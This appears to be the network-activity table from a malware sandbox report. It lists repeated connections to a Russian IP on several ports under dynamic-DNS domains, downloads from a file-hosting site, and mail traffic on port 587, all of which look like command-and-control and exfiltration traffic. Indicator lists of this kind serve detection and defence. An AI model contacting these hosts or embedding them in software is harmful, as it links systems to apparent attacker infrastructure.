| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 8.8.8.8:53 | listpoints.click | udp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | gservicese.com | udp |
| RU | 91.215.85.63:2718 | gservicese.com | tcp |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | mail.sarahfoils.com | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| IN | 103.21.58.122:587 | mail.sarahfoils.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 8.8.8.8:53 | 122.58.21.103.in-addr.arpa | udp |
| RU | 91.215.85.63:5225 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:2718 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:8118 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:5225 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:2718 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:8118 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 2subsmepjzqnvvukhd.fun | udp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| NL | 45.67.228.133:443 | 2subsmepjzqnvvukhd.fun | tcp |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:5225 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:2718 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:8118 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | defrosscrappeo.pw | udp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 133.228.67.45.in-addr.arpa | udp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 129.153.80.87:8855 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 107.175.229.139:8087 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 107.175.229.139:8087 | tcp | |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 107.175.229.139:8087 | tcp | |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:3839 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| RU | 91.215.85.63:5225 | listpoints.click | tcp |
| RU | 91.215.85.63:2718 | listpoints.click | tcp |
| RU | 91.215.85.63:8118 | listpoints.click | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:5225 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:2718 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:8118 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 107.175.229.139:8087 | tcp | |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 129.153.80.87:8855 | tcp | |
| RU | 91.215.85.63:5225 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:2718 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| RU | 91.215.85.63:8118 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:5225 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:2718 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 188.114.96.0:80 | defrosscrappeo.pw | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:5225 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:2718 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:8118 | retghrtgwtrgtg.bounceme.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 91.215.85.63:7020 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | gservicese.com | udp |
| RU | 91.215.85.63:2718 | gservicese.com | tcp |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:5225 | center.onthewifi.com | tcp |
| RU | 91.215.85.63:2718 | center.onthewifi.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| US | 8.8.8.8:53 | defrosscrappeo.pw | udp |
| US | 188.114.97.0:80 | defrosscrappeo.pw | tcp |
| US | 8.8.8.8:53 | 0.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | center.onthewifi.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:7020 | center.onthewifi.com | tcp |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 13.107.43.13:443 | onedrive.live.com | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| US | 107.175.229.139:8087 | tcp | |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 3.80.150.121:443 | service-domain.xyz | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:8118 | datastream.myvnc.com | tcp |
| US | 8.8.8.8:53 | 121.150.80.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.33.222.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.77.123.92.in-addr.arpa | udp |
| US | 129.153.80.87:8855 | tcp | |
| RU | 91.215.85.63:3839 | datastream.myvnc.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 108.177.126.138:443 | clients2.google.com | tcp |
| RU | 91.215.85.63:7020 | datastream.myvnc.com | tcp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| RU | 91.215.85.63:2718 | datastream.myvnc.com | tcp |
